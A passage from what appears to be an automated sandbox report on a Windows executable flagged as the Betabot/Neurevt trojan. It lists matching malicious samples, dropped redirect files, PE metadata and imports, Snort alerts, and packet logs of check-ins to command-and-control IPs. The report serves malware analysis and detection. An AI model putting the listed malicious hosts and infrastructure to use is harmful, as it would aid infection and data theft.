	Tghyrq0uv7.doc	Get hash	malicious	Browse	176.114.0.75
	ezKmnDht44.doc	Get hash	malicious	Browse	176.114.0.75
	opcv1fRvOU.doc	Get hash	malicious	Browse	176.114.0.75

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
57f3642b4e37e28f5cbe3020c9331b4c	iWLjWhsT55.exe	Get hash	malicious	Browse	91.234.34.80
	Payment.html	Get hash	malicious	Browse	91.234.34.80
	sample3.exe	Get hash	malicious	Browse	91.234.34.80
	8xiF0lExRy.exe	Get hash	malicious	Browse	91.234.34.80
	Documento--SII--33875.exe	Get hash	malicious	Browse	91.234.34.80
	OnZH4ftMLU.exe	Get hash	malicious	Browse	91.234.34.80
	yytr.dll	Get hash	malicious	Browse	91.234.34.80
	vG4U0RKFY2.exe	Get hash	malicious	Browse	91.234.34.80
	evil.doc	Get hash	malicious	Browse	91.234.34.80
	davay (2).exe	Get hash	malicious	Browse	91.234.34.80
	davay.exe	Get hash	malicious	Browse	91.234.34.80
	https://notification1.bubbleapps.io/version-test?debug_mode=true	Get hash	malicious	Browse	91.234.34.80
	https://secureddoc.unicornplatform.com	Get hash	malicious	Browse	91.234.34.80
	5fd9d7ec9e7aetar.dll	Get hash	malicious	Browse	91.234.34.80
	5fd885c499439tar.dll	Get hash	malicious	Browse	91.234.34.80
	https://secureddoc.unicornplatform.com/	Get hash	malicious	Browse	91.234.34.80
	http://contoubi00.epizy.com/ubi/	Get hash	malicious	Browse	91.234.34.80
	https://secureddoc.unicornplatform.com	Get hash	malicious	Browse	91.234.34.80
	http://vcomdesign.com	Get hash	malicious	Browse	91.234.34.80
	https://aud-amplified.unicornplatform.com/	Get hash	malicious	Browse	91.234.34.80

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\logout[1].htm Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	245
Entropy (8bit):	5.134094267737333
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwol6hEr6VX16hu9nPiYpavDy+KqD:J0+ox0RJWWPtwhT
MD5:	C68F1680DF269C4A6DE44D264FDD805C
SHA1:	F1FE9872CB13CEBF6915855F9DB6C3A1A6298D9E
SHA-256:	9A606C23F8F92DBF5DFCD167F03E0143CC509C84809970DC0118FCB0C9D101CC
SHA-512:	4D9B869C1BFEA14AFB60669268F04F505166C55D520DA64A438CC52ACCC4F65198ECCD2E1C7E7CAC0A74645BD2F55483F8EB335FE1A0D7164F9239CF39ECFE31
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="http://firecrackers.ru/kin/logout.php">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\logout[1].htm Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	HTML document, ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	407
Entropy (8bit):	5.009158197475648
Encrypted:	false
SSDEEP:	6:q43tISl6kXiMIWSU6XlI5LP8IpfGW28n0+Dy9xwol6hEr6VX16hu9nPiYpavDy+T:TPVIVvlI5r8INGY0+ox0RJWWPtwhT
MD5:	A4D2707EE30261CADF0B61AE25EB3BAD
SHA1:	A1BAC84DB8242FBEBD2D1DCCCEDD47F817608597
SHA-256:	FE3F92BFEA7CA11202C0219958BF6D61936949924A427AF6CDF60FE167C69C40
SHA-512:	B55BE8E1FFFD5C3A9FD5B8016421F5577C90C6AE45E42ABE9E474470CCDA0E3F157948FBF701CA651D0F37CB3D3F916A47B9D575BC674035DE44687F8C94AEF8
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="http://firecrackers.ru/kin/logout.php">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\logout[2].htm Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.43530643106624
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
MD5:	4F8E702CC244EC5D4DE32740C0ECBD97
SHA1:	3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
SHA-256:	9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
SHA-512:	21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\logout[1].htm Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	HTML document, ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	407
Entropy (8bit):	5.009158197475648
Encrypted:	false
SSDEEP:	6:q43tISl6kXiMIWSU6XlI5LP8IpfGW28n0+Dy9xwol6hEr6VX16hu9nPiYpavDy+T:TPVIVvlI5r8INGY0+ox0RJWWPtwhT
MD5:	A4D2707EE30261CADF0B61AE25EB3BAD
SHA1:	A1BAC84DB8242FBEBD2D1DCCCEDD47F817608597
SHA-256:	FE3F92BFEA7CA11202C0219958BF6D61936949924A427AF6CDF60FE167C69C40
SHA-512:	B55BE8E1FFFD5C3A9FD5B8016421F5577C90C6AE45E42ABE9E474470CCDA0E3F157948FBF701CA651D0F37CB3D3F916A47B9D575BC674035DE44687F8C94AEF8
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="http://firecrackers.ru/kin/logout.php">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\logout[1].htm Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	245
Entropy (8bit):	5.134094267737333
Encrypted:	false
SSDEEP:	6:pn0+Dy9xwol6hEr6VX16hu9nPiYpavDy+KqD:J0+ox0RJWWPtwhT
MD5:	C68F1680DF269C4A6DE44D264FDD805C
SHA1:	F1FE9872CB13CEBF6915855F9DB6C3A1A6298D9E
SHA-256:	9A606C23F8F92DBF5DFCD167F03E0143CC509C84809970DC0118FCB0C9D101CC
SHA-512:	4D9B869C1BFEA14AFB60669268F04F505166C55D520DA64A438CC52ACCC4F65198ECCD2E1C7E7CAC0A74645BD2F55483F8EB335FE1A0D7164F9239CF39ECFE31
Malicious:	false
Preview:	<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="http://firecrackers.ru/kin/logout.php">here</a>.</p>.</body></html>.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\logout[2].htm Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.43530643106624
Encrypted:	false
SSDEEP:	3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGu:q43tISl6kXiMIWSU6XlI5LP8IpfGu
MD5:	4F8E702CC244EC5D4DE32740C0ECBD97
SHA1:	3ADB1F02D5B6054DE0046E367C1D687B6CDF7AFF
SHA-256:	9E17CB15DD75BBBD5DBB984EDA674863C3B10AB72613CF8A39A00C3E11A8492A
SHA-512:	21047FEA5269FEE75A2A187AA09316519E35068CB2F2F76CFAF371E5224445E9D5C98497BD76FB9608D2B73E9DAC1A3F5BFADFDC4623C479D53ECF93D81D3C9F
Malicious:	false
Preview:	<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Windows\SysWOW64\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbON:u
MD5:	89CA7E02D8B79ED50986F098D5686EC9
SHA1:	A602E0D4398F00C827BFCF711066E67718CA1377
SHA-256:	30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
SHA-512:	C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
Malicious:	false
Preview:	........................................user.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.671262580254287
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	144C0621CA5ECB402DE01D8F10044F92A2EF917522E4B.exe
File size:	570880
MD5:	c46f1a56503f218c2977b4b42f5aa84b
SHA1:	25449ec8c765f94ffc284022374a9139dc46ebef
SHA256:	144c0621ca5ecb402de01d8f10044f92a2ef917522e4b4955f3760bb17095bac
SHA512:	b7cc796f0d6940f35a3495502a58bfa9a2f77f95afb41e136fd0431a39094ab88fe0be61ed9f6bcea3953e76fbe24912c0fb01b2019914e5a4284cbb1c1248f6
SSDEEP:	6144:fx3+m6HONThlgxVlAwiGURZKgLaXEBXON3dTmwsXYXjxPkQv4RYj8yqrK2BhG0Oh:f8UPgKIgL0eOnTHscPmvOOp1beWNGxdF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9X..}9..}9..}9..Z...]9..Z...d9..Z....9..tA..p9..}9..s8..ck..\|9..ck..\|9..ck..\|9..Rich}9..........................PE..L...!.lW...

File Icon


Icon Hash:	30d2d2d6c6f4da00

Static PE Info

General
Entrypoint:	0x46ac20
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x576CA921 [Fri Jun 24 03:29:37 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	2b2756717223a193efc4a129f78f966e

Entrypoint Preview

Instruction
call 00007FAF6101ED5Ch
jmp 00007FAF6101A67Bh
push ebp
mov ebp, esp
sub esp, 04h
mov dword ptr [ebp-04h], edi
mov edi, dword ptr [ebp+08h]
mov ecx, dword ptr [ebp+0Ch]
shr ecx, 07h
pxor xmm0, xmm0
jmp 00007FAF6101A86Ah
lea esp, dword ptr [esp+00000000h]
nop
movdqa dqword ptr [edi], xmm0
movdqa dqword ptr [edi+10h], xmm0
movdqa dqword ptr [edi+20h], xmm0
movdqa dqword ptr [edi+30h], xmm0
movdqa dqword ptr [edi+40h], xmm0
movdqa dqword ptr [edi+50h], xmm0
movdqa dqword ptr [edi+60h], xmm0
movdqa dqword ptr [edi+70h], xmm0
lea edi, dword ptr [edi+00000080h]
dec ecx
jne 00007FAF6101A832h
mov edi, dword ptr [ebp-04h]
mov esp, ebp
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 10h
mov dword ptr [ebp-04h], edi
mov eax, dword ptr [ebp+08h]
cdq
mov edi, eax
xor edi, edx
sub edi, edx
and edi, 0Fh
xor edi, edx
sub edi, edx
test edi, edi
jne 00007FAF6101A89Eh
mov ecx, dword ptr [ebp+10h]
mov edx, ecx
and edx, 7Fh
mov dword ptr [ebp-0Ch], edx
cmp ecx, edx
je 00007FAF6101A874h
sub ecx, edx
push ecx
push eax
call 00007FAF6101A7D8h
add esp, 08h
mov eax, dword ptr [ebp+08h]
mov edx, dword ptr [ebp-0Ch]
test edx, edx
je 00007FAF6101A8A7h
add eax, dword ptr [ebp+10h]
sub eax, edx
mov dword ptr [ebp-08h], eax
xor eax, eax
mov edi, dword ptr [ebp-08h]
mov ecx, dword ptr [ebp-0Ch]
rep stosb
mov eax, dword ptr [ebp+08h]
jmp 00007FAF6101A890h
neg edi
add edi, 10h
mov dword ptr [ebp-10h], edi
xor eax, eax
mov edi, dword ptr [ebp+08h]

Rich Headers

Programming Language:

[ C ] VS2005 build 50727
[C++] VS2005 build 50727
[LNK] VS2008 build 21022
[RES] VS2008 build 21022
[C++] VS2008 build 21022
[ASM] VS2005 build 50727
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7bce4	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xaa000	0x6814	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7b848	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7a000	0x38c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x78183	0x78200	False	0.664082823881	data	5.83621626424	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x7a000	0x3020	0x3200	False	0.363671875	data	5.57793432601	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7e000	0x233d0	0x1600	False	0.321200284091	GLS_BINARY_LSB_FIRST	3.11810731361	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.bss	0xa2000	0x7d00	0x7e00	False	0.00164310515873	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xaa000	0x6814	0x6a00	False	0.42172759434	data	5.52725503981	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xaa27c	0x128	GLS_BINARY_LSB_FIRST	Russian	Russia
RT_ICON	0xaa3a4	0x568	GLS_BINARY_LSB_FIRST	Russian	Russia
RT_ICON	0xaa90c	0x468	GLS_BINARY_LSB_FIRST	Russian	Russia
RT_ICON	0xaad74	0x2e8	dBase III DBT, version number 0, next free block index 40	Russian	Russia
RT_ICON	0xab05c	0x8a8	data	Russian	Russia
RT_ICON	0xab904	0x10a8	dBase III DBT, version number 0, next free block index 40	Russian	Russia
RT_ICON	0xac9ac	0x668	data	Russian	Russia
RT_ICON	0xad014	0xea8	data	Russian	Russia
RT_ICON	0xadebc	0x25a8	dBase III DBT, version number 0, next free block index 40	Russian	Russia
RT_GROUP_ICON	0xb0464	0x84	data	Russian	Russia
RT_MANIFEST	0xb04e8	0x329	ASCII text, with very long lines, with CRLF line terminators	English	United States

Imports

DLL

Import

USER32.dll

GetClipboardViewer, LoadCursorW, AppendMenuA, CallWindowProcA, CharNextA, CharPrevA, CheckDlgButton, CloseClipboard, CreateDialogParamA, CreatePopupMenu, CreateWindowExA, DefWindowProcA, DestroyWindow, DialogBoxParamA, DispatchMessageA, EmptyClipboard, EnableMenuItem, ExitWindowsEx, FillRect, FindWindowExA, GetClassInfoA, GetDC, GetDlgItemTextA, GetMessagePos, GetSystemMenu, GetWindowLongA, IsWindowEnabled, IsWindowVisible, LoadBitmapA, LoadCursorA, LoadImageA, OpenClipboard, PeekMessageA, PostQuitMessage, RegisterClassA, ScreenToClient, SendMessageA, SendMessageTimeoutA, SetClipboardData, SetWindowLongA, SetWindowTextA, SystemParametersInfoA, TrackPopupMenu, DefWindowProcW, GetWindowWord, SetWindowWord, BeginPaint, GetSysColor, GetClientRect, SetRect, EndPaint, GetLastActivePopup, KillTimer, ShowWindow, PostMessageW, SendMessageW, EnableWindow, SetTimer, SetForegroundWindow, RegisterClassW, DialogBoxParamW, SetDlgItemTextW, EndDialog, GetWindowRect, GetSystemMetrics, SetWindowPos, OemToCharA, GetWindowLongW, SetWindowLongW, GetKeyState, TranslateMessage, DispatchMessageW, SetCursor, GetParent, SendDlgItemMessageW, GetDlgItem, InvalidateRect, UpdateWindow, MessageBoxW, SetWindowTextW, GetDlgItemTextW, SetActiveWindow, LoadStringW, SetClassLongA, MessageBoxIndirectA, DrawTextA, PeekMessageW, SetDlgItemTextA, wsprintfA, SetProcessDefaultLayout, IsWindow

KERNEL32.dll

GetStringTypeW, GetStringTypeA, FlushFileBuffers, GetConsoleCP, VirtualAlloc, InitializeCriticalSection, GetCurrentProcessId, VirtualFree, InterlockedDecrement, InterlockedIncrement, GetTimeZoneInformation, LeaveCriticalSection, EnterCriticalSection, GetSystemTimeAsFileTime, CloseHandle, CompareFileTime, CopyFileA, CreateDirectoryA, CreateFileA, CreateProcessA, CreateThread, DeleteFileA, ExitProcess, ExpandEnvironmentStringsA, FindClose, FindFirstFileA, FindNextFileA, FreeLibrary, GetDiskFreeSpaceA, GetExitCodeProcess, GetFileAttributesA, GetFileSize, GetFullPathNameA, GetLastError, GetPrivateProfileStringA, GetProcAddress, GetShortPathNameA, GetSystemDirectoryA, GetTempFileNameA, GetTempPathA, GetVersion, GlobalAlloc, LoadLibraryExA, MoveFileA, MulDiv, ReadFile, RemoveDirectoryA, SearchPathA, SetCurrentDirectoryA, SetErrorMode, SetFileAttributesA, SetFilePointer, Sleep, WaitForSingleObject, WriteFile, WritePrivateProfileStringA, lstrcatA, lstrcmpA, lstrcmpiA, lstrcpynA, lstrlenA, LCMapStringA, HeapReAlloc, HeapSize, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetConsoleMode, FindFirstFileW, SetCurrentDirectoryW, SetFileTime, LocalFileTimeToFileTime, DosDateTimeToFileTime, LoadLibraryA, CreateDirectoryW, GlobalFree, GlobalUnlock, GlobalHandle, GetCurrentDirectoryW, GetEnvironmentVariableW, GetModuleHandleA, MultiByteToWideChar, WideCharToMultiByte, GetDriveTypeW, HeapFree, RtlUnwind, GetFileType, TerminateProcess, GetCurrentProcess, GetLocaleInfoA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CompareStringA, CompareStringW, SetEnvironmentVariableA, GlobalLock, HeapAlloc, GetCommandLineA, PulseEvent, GetProcessHeap, GetThreadPriority, LocalAlloc, GetStartupInfoW, LCMapStringW, GetWindowsDirectoryA, GetVersionExA, SetEndOfFile, GetTickCount, QueryPerformanceCounter, HeapCreate, HeapDestroy, GetCurrentThreadId, SetLastError, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, DeleteCriticalSection, GetStartupInfoA, SetHandleCount, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, GetStdHandle, RaiseException, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
08/01/21-13:06:51.659397	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49752	80	192.168.2.3	91.234.34.80
08/01/21-13:06:55.213825	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49754	80	192.168.2.3	91.234.34.80
08/01/21-13:06:59.972126	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49759	80	192.168.2.3	91.234.34.80
08/01/21-13:07:16.617347	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49768	80	192.168.2.3	64.70.19.203
08/01/21-13:07:20.065204	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49770	80	192.168.2.3	64.70.19.203
08/01/21-13:07:24.271327	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49771	80	192.168.2.3	64.70.19.203
08/01/21-13:07:50.879247	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49772	80	192.168.2.3	91.234.34.80
08/01/21-13:07:54.138004	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49774	80	192.168.2.3	91.234.34.80
08/01/21-13:07:57.221851	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49776	80	192.168.2.3	91.234.34.80
08/01/21-13:08:10.499156	TCP	2018784	ET TROJAN Win32/Neurevt.A/Betabot Check-in 4	49778	80	192.168.2.3	64.70.19.203

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 1, 2021 13:06:51.598057032 CEST	49752	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.658116102 CEST	80	49752	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.658314943 CEST	49752	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.659396887 CEST	49752	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.659507036 CEST	49752	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.719734907 CEST	80	49752	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.719811916 CEST	80	49752	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.721123934 CEST	49752	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.759644985 CEST	80	49752	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.764040947 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.827904940 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.828386068 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.872255087 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.933835030 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.936832905 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.936882973 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.936919928 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.936948061 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.936990976 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.937033892 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.937041044 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:51.947254896 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:51.947540998 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:52.008964062 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:52.073404074 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:52.073618889 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:52.088565111 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:52.156169891 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:52.156280041 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:52.164333105 CEST	49752	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:52.223362923 CEST	80	49752	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:52.223417997 CEST	80	49752	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:52.223551989 CEST	49752	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:52.230334044 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:52.328819036 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:52.341881990 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:52.341948986 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:52.342161894 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:52.342685938 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:52.404262066 CEST	443	49753	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:52.404505014 CEST	49753	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.146369934 CEST	49752	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.147404909 CEST	49754	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.206646919 CEST	80	49754	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.206959963 CEST	80	49752	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.208575964 CEST	49752	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.208688974 CEST	49754	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.213824987 CEST	49754	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.213920116 CEST	49754	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.273513079 CEST	80	49754	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.273550034 CEST	80	49754	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.273590088 CEST	80	49754	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.274086952 CEST	49754	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.301280975 CEST	49755	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.362895012 CEST	443	49755	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.364387989 CEST	49755	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.372395039 CEST	49755	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.433974028 CEST	443	49755	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.433999062 CEST	443	49755	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.435513973 CEST	49755	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.435720921 CEST	49755	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.438932896 CEST	49755	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:55.500215054 CEST	443	49755	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.567944050 CEST	443	49755	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.567972898 CEST	443	49755	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:55.568968058 CEST	49755	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:56.079833031 CEST	49755	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:56.140996933 CEST	443	49755	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:56.147088051 CEST	49755	443	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:59.913935900 CEST	49754	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:59.914854050 CEST	49759	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:59.971106052 CEST	80	49759	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:59.971362114 CEST	49759	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:59.972126007 CEST	49759	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:59.972157955 CEST	49759	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:06:59.973409891 CEST	80	49754	91.234.34.80	192.168.2.3
Aug 1, 2021 13:06:59.977783918 CEST	49754	80	192.168.2.3	91.234.34.80
Aug 1, 2021 13:07:00.026202917 CEST	80	49759	91.234.34.80	192.168.2.3
